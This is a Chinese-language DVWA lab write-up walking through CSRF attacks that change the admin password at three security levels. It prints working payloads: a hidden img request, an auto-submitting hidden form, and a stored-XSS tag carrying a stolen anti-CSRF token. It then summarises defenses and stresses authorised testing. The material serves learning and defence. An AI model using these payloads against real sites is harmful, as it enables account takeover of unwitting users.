1. 漏洞简介
CSRF(跨站请求伪造)是一种攻击,使得攻击者能够以受害者的身份执行非预期的操作。在靶场DVWA中,我将尝试通过CSRF漏洞更改管理员密码。
2. 实验环境
- DVWA版本:DVWA-old
- 浏览器:火狐
- 默认管理员账户:admin / password
3. 漏洞利用过程
3.1 Low 级别
步骤:
1. 登录DVWA,将安全级别设置为Low
2. 访问CSRF页面,观察更改密码的表单
3. 先尝试在页面修改初始密码为“123”,点击“Change(更改)”后,就出现下面的链接。
4. 复制上面的 url,用Notepad+创建一个包含以下内容的HTML文件,命名为“csrf_attack.html”
<img src="http://127.0.0.1/DVWA-old/vulnerabilities/csrf/?
password_new=hacked&password_conf=hacked&Change=Change" style="display:none;" />
5. 在管理员已登录的状态下访问这个HTML文件 (注:一定要在同一个浏览器中打开)
6. 最后,尝试使用新密码"hacked"登录
结果:
- 攻击成功:能够使用"hacked"作为新密码登录,证实了密码已被更改。
- 无用户交互:整个过程中,受害用户(管理员)没有直接在DVWA网站上执行任何操作。
3.2 Medium 级别
步骤:
1. 将安全级别设置为Medium
3. 创建一个新的HTML文件,内容如下:
<form action="http:///127.0.0.1/DVWA-old/vulnerabilities/csrf/" method="GET">
<input type="hidden" name="password_new" value="hacked2">
<input type="hidden" name="password_conf" value="hacked2">
<input type="hidden" name="Change" value="Change">
</form>
<script>document.forms[0].submit();</script>
4. 在管理员已登录的状态下访问这个HTML文件
5. 尝试使用新密码"hacked2"登录
结果:
- 攻击成功:在Medium安全级别下,成功更改了目标账户的密码。
- 验证方法:使用新设置的密码成功登录DVWA系统,证实密码已被更改。
在DVWA的Medium安全级别下,我成功执行了CSRF攻击并更改了目标账户的密码,这表明尽管系统可能增加了一些基本的防御措施(如Referer检查或简单的令牌),但这些措施仍然不足以有效防止CSRF攻击。
与Low级别相比,Medium级别可能需要稍微复杂一些的攻击脚本来绕过这些基本安全检查,但攻击的成功执行凸显了即使在提高安全意识的情况下,如果没有实施更强大和全面的保护机制,Web应用程序仍然容易受到CSRF等攻击的影响。
这个结果强调了持续安全评估和多层次防御策略的重要性。
3.3 High 级别
步骤:
1. 将安全级别设置为High
2. 观察 CSRF 页面的 URL,可发现其中包含 user_token。
3. 尝试以下步骤:
先在DVWA中创建一个存储型XSS漏洞
- 找到一个可以输入并存储数据的功能,通常是留言板或用户资料页面。
- 在输入框中插入以下代码:
<img src="DVWA-old/vulnerabilities/csrf/?
password_new=password&password_conf=password&
Change=Change&user_token=d07b9b7912edf5f7c47afd29e44efb64#">
但是,发现这个留言板有字数限制,如下:
接下来,打开 “检查” 功能,将 Maxlength="50" 更改为 “500”。
但即便将有 token 的那个链接复制粘贴并且更改了长度,再输入同样的代码,显示空白,依然没有成功。
测试失败了。没关系,那么,我再尝试一下其他方法。
那么,这一次直接复制自己在 CSRF 设置的密码成功的链接,然后将其复制到一个新的标签页上。(注意:先暂时不要输入。)
接下来,右击“检查”,在“控制台”里输入输入shuru以下代码来获取 user_token:
document.getElementsByName("user_token")
然后,使用获取到的token在新标签页面里构造新的CSRF攻击。更改的过程细节如下:
原链接:
127.0.0.1/DVWA-old/vulnerabilities/csrf/?password_new=password&password_conf=password&Change=Change&
user_token=d07b9b7912edf5f7c47afd29e44efb64#
更改成:
127.0.0.1/DVWA-old/vulnerabilities/csrf/?password_new=123&password_conf=123&Change=Change&
user_token=b6c092cedbfd6f750e0b4a40f8f24ea7#
结果
测试成功,成功实现了在 High 级别下的 CSRF 攻击利用。
4. 防御措施
根据不同级别的防御措施,总结以下几点:
- Low:几乎没有防御
- Medium:检查Referer头
- High:使用anti-CSRF token
5. 学习心得
在进行 DVWA 中 CSRF 漏洞利用的实验过程中,我收获了许多宝贵的经验和深刻的感悟。
这个实验并非一帆风顺,从 Low 级别到 High 级别,每一步都充满了挑战。尤其是在 High 级别中,遇到了诸多障碍,如留言板的字数限制、初次尝试的失败等。然而,正是这些困难让我深刻体会到了永不放弃的重要性。
当面对一次次的失败时,心中也曾有过沮丧和迷茫。但我明白,放弃就意味着前功尽弃,只有坚持下去,不断尝试新的方法,才有可能找到突破的路径。于是,我一遍又一遍地审视问题,分析失败的原因,从不同的角度去思考解决方案。
在不断尝试的过程中,我不仅锻炼了自己的技术能力,更培养了坚韧不拔的毅力和解决问题的能力。我学会了在困境中保持冷静,不被挫折打倒,积极寻找新的思路和方法。
通过这次实验,我也更加深刻地认识到网络安全的重要性和复杂性。CSRF 漏洞的存在可能给系统带来严重的安全威胁,而不同安全级别的设置虽然在一定程度上增加了攻击的难度,但也并非绝对安全。这提醒着我们在实际的网络应用开发和维护中,必须高度重视安全问题,采取更加严格和有效的防御措施。
同时,这次实验也让我明白,学习是一个不断探索和尝试的过程。我们不能害怕失败,而应该把失败看作是成长的机会。只有在不断的实践和尝试中,我们才能不断提升自己的能力,掌握更多的知识和技能。
总之,这次 CSRF 漏洞实验是一次极具价值的学习经历。它让我懂得了坚持的力量,培养了我的问题解决能力,也加深了我对网络安全的认识。在未来的学习和工作中,我将继续保持这种不放弃的精神,勇于面对各种挑战,不断提升自己,为网络安全事业贡献自己的一份力量。
6. 注意事项
- 仅在授权的环境中进行测试
- 不要在真实的生产环境中尝试这些攻击
- 学习CSRF漏洞的目的是为了更好地理解和防御此类攻击
7. 参考资料
- DVWA官方文档
- OWASP CSRF防护指南:https://owasp.org/www-community/attacks/csrf